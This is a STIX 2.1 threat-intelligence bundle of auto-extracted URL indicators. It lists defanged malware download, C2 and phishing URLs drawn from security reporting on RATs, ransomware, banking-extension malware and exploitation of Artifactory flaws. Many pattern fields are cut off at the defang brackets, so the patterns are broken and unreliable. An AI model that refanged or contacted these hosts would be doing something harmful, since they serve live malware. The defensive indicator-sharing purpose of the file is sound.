{"type":"bundle","id":"bundle--6f9dce7e-5ad5-40c6-8113-b303403df019","objects":[{"type":"identity","spec_version":"2.1","id":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","created":"2026-09-16T08:59:08.409Z","modified":"2026-09-16T08:59:08.409Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--5777b1e2-58d7-4d3e-8950-551ef6c80443","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: [.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--407ba1d5-5fc7-4a33-b512-0b66339089c9","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: nder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankin","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23468e3c-ba7d-4396-85cd-15b7a599874a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://aa.amazingshield[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent","pattern":"[url:value = 'http://aa.amazingshield[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--203293ab-1c85-4b52-a1df-63c4503f0118","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://drelto[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain s","pattern":"[url:value = 'https://drelto[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--998fe19d-2cc0-4ed3-840d-f73ea246e1f5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://stryper[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sHelper\\docro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia R","pattern":"[url:value = 'https://stryper[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b28038b5-5eff-4cc3-ba28-6addb396b0c3","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://archive[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemorySca","pattern":"[url:value = 'https://archive[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f1de08d-0d6e-474d-96d3-6d60c33d6aa3","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://connection[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage:","pattern":"[url:value = 'https://connection[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc35e134-a7fc-482c-85a7-95625d33680f","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://granderevolucao[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET P","pattern":"[url:value = 'https://granderevolucao[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a938a70-1948-4c3b-8748-22b566509b95","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://ia601808[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel","pattern":"[url:value = 'https://ia601808[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80503740-caa6-4d8f-94f1-40432935d5c3","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://volmira[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. The","pattern":"[url:value = 'https://volmira[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18a13e37-3db7-42d9-aac9-4aeb8497fa30","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://zaviro[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request wa","pattern":"[url:value = 'https://zaviro[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1ffe065-746b-442a-b2a5-bee1e24be994","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://www[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not re","pattern":"[url:value = 'http://www[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7600031b-983d-472c-950a-939c04308eb7","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://proof.gitprogram[","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: gleBamboo Phishing, exploit delivery, and C2 infrastructure hxxps://proof.gitprogram[.]com/a4/j8 URL JungleBamboo September 2 phishing URL servin","pattern":"[url:value = 'https://proof.gitprogram[']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a869388-5b4d-426e-a7db-8856eb61135a","created":"2026-09-11T12:14:12.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://apimantax[","description":"Seen in \"New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims\" (Cyber Security News). Context: cted outbound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically r","pattern":"[url:value = 'https://apimantax[']","pattern_type":"stix","valid_from":"2026-09-11T12:14:12.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65c770bc-8354-4ba3-afc5-30a55d53ecf6","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://3.88.162[","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second-stage payload download URL 2026-09-07","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b12e79f-a5b5-4552-b341-714f9d2b7959","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://log.gitclone[","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: Actor IP exploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-420","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c83ebce3-cf8e-431e-bfae-575bcaea16f6","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://3.88.162[","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: ]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash /tmp/.z — 513a907b69edffc3cb77a4","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc1ec831-415b-4659-9c9f-9780625c3332","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://log.gitclone[","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: [.]88 , 137.184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Ha","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--93bfa9be-346e-4086-af3d-2bce903bf6ac","created":"2026-09-11T07:14:05.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://apimantax[","description":"Seen in \"Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files\" (GBHackers). Context: lution. Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and publ","pattern":"[url:value = 'https://apimantax[']","pattern_type":"stix","valid_from":"2026-09-11T07:14:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/mantax-otax-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--46a07c89-07f7-43b9-96d3-b1d2f7125cc7","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://3.88.162[","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: 026-42018/CVE-2026-42016 exploitation 2026-09-06 2026-09-08 hxxp://3.88.162[.]79:36789/smtp Second load of payload after CVE-2026-42018/","pattern":"[url:value = 'http://3.88.162[']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83a2a08a-4d30-40fd-a5ab-21bfa23f4d6d","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://log.gitclone[","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: loiting CVE-2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2","pattern":"[url:value = 'http://log.gitclone[']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d51562c-b8fc-4bd5-9223-71e00dcd0797","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://stro7121.blob.core.windows[","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: xe interpreter to download and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script","pattern":"[url:value = 'https://stro7121.blob.core.windows[']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f9bb55d-5cc4-46a3-bbb7-fd49743cb0f4","created":"2026-09-10T08:06:02.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://167.148.195[","description":"Seen in \"Hackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks\" (Cyber Security News). Context: 172ec Brazilian financial campaign malware or tool hash URL hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Download location for SockTz versi","pattern":"[url:value = 'http://167.148.195[']","pattern_type":"stix","valid_from":"2026-09-10T08:06:02.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/gpt-powered-tools/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1b414e5-3788-48c8-852f-3ed6e71829e5","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://45.142.193[","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: ing followed by Base64 encoding using certutil Download URL hxxp://45.142.193[.]132:8000/lsa_collect.exe Download location for LSA bootkey","pattern":"[url:value = 'http://45.142.193[']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f25975e0-0d55-49cd-9c01-0a242df139df","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://api-prod.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ad.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-prod.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evid","pattern":"[url:value = 'https://api-prod.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95eeb6a2-dbe5-4f17-afc5-0905aee64181","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://download.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://download.secboxes[.]com:443/dist.zip URL Download URL August 2026 hxxps://api-","pattern":"[url:value = 'https://download.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d19aecb-7b1f-4f86-805e-543200b11be5","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://evidence.msbenefit[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: od.secboxes[.]com:443/download URL Download URL August 2026 hxxps://evidence.msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki","pattern":"[url:value = 'https://evidence.msbenefit[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d3078e7-49f0-4b2f-942e-e68010875c76","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://project.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: n[.]com Hostname TA412 BlueMoon exploit page September 2026 hxxps://project.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://","pattern":"[url:value = 'https://project.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c7dba66-d176-4c6d-b703-080be2e327bc","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://recommendation-letter.secboxes[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: ecboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://recommendation-letter.secboxes[.]com/ChromeUpdate.exe URL Download URL August 2026 hxxps://","pattern":"[url:value = 'https://recommendation-letter.secboxes[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aa04e26c-15df-4daf-93b8-74d4c0040003","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://zki0y83.msbenefit[","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: .msbenefit[.]com/msgbox.exe URL Download URL September 2026 hxxps://zki0y83.msbenefit[.]com:443/feed URL Download URL August 2026 extension-manage","pattern":"[url:value = 'https://zki0y83.msbenefit[']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9c72450-b927-4ea6-b30c-48fe7810e54f","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://kr[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: 2 endpoint for the reverse TCP proxy PowerShell payload URL hxxps://kr[.]cedar2glanz[.]ru/jewel[.]js Secondary PowerShell payload f","pattern":"[url:value = 'https://kr[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21e29dde-aba7-45a6-be94-85802e483006","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://phys[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: for the verification.google branch PowerShell download URL hxxps://phys[.]stunned-amniotic[.]com/hub[.]log ZIP payload retrieved by","pattern":"[url:value = 'https://phys[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9af6307e-61c7-41d1-aae6-904f3f481fd3","created":"2026-09-09T14:26:47.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://telegra[","description":"Seen in \"ClearFake Deploys Crypto Stealer That Uses Vulnerable Driver to Kill EDR Security Tools\" (Cyber Security News). Context: loader observed at the Ukrainian organization Dead-drop URL hxxps://telegra[.]ph/Functions-04-03 Public page used by the Amatera branch","pattern":"[url:value = 'https://telegra[']","pattern_type":"stix","valid_from":"2026-09-09T14:26:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/clearfake-deploys-crypto-stealer/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--240b070e-c200-4b69-b182-fac3146e3ee9","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://146[","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: s. The initial stager downloads a second-stage payload from hxxps://146[.]103[.]99[.]177:8443/0c5b76709523, decodes it, and XOR-decr","pattern":"[url:value = 'https://146[']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43afd2f3-36d1-4703-abaa-d56486a00fcf","created":"2026-09-03T16:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://＜account-id＞.acemlnd[","description":"Seen in \"ASCII smuggling crosses over from AI prompt injection to phishing evasion\" (Microsoft Security Blog). Context: s do not point at the brand domain at all – they look like: hxxps://＜account-id＞.acemlnd[.]com/＜tracking-token＞ hxxps://＜brand-subdomain＞.activehoste","pattern":"[url:value = 'https://＜account-id＞.acemlnd[']","pattern_type":"stix","valid_from":"2026-09-03T16:00:00.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security 